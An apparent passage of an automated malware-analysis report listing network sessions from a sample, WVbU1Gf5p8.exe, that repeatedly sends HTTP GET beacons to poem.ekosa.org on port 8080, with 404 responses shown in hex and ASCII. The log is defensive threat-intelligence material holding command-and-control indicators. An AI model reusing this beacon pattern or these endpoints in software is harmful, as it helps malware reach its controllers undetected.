      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      45192.168.2.449812210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:23.467602015 CET488OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:23.732043982 CET488INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      46192.168.2.449813210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:24.011401892 CET489OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:24.282001972 CET490INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      47192.168.2.449814210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:24.547841072 CET490OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:24.808159113 CET491INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:24 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      48192.168.2.449815210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:25.193589926 CET492OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:25.463578939 CET492INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      49192.168.2.449816210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:25.729624033 CET493OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:25.991885900 CET493INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:25 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      5192.168.2.449763210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:59.492043972 CET109OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:59.760138988 CET115INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:59 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      50192.168.2.449817210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:26.297059059 CET494OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:26.560982943 CET495INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      51192.168.2.449818210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:26.957791090 CET495OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:27.229217052 CET496INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:26 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      52192.168.2.449819210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:27.505677938 CET497OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:27.777065039 CET497INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      53192.168.2.449820210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:28.050844908 CET498OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:28.313766956 CET498INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:27 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      54192.168.2.449821210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:28.720854044 CET499OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
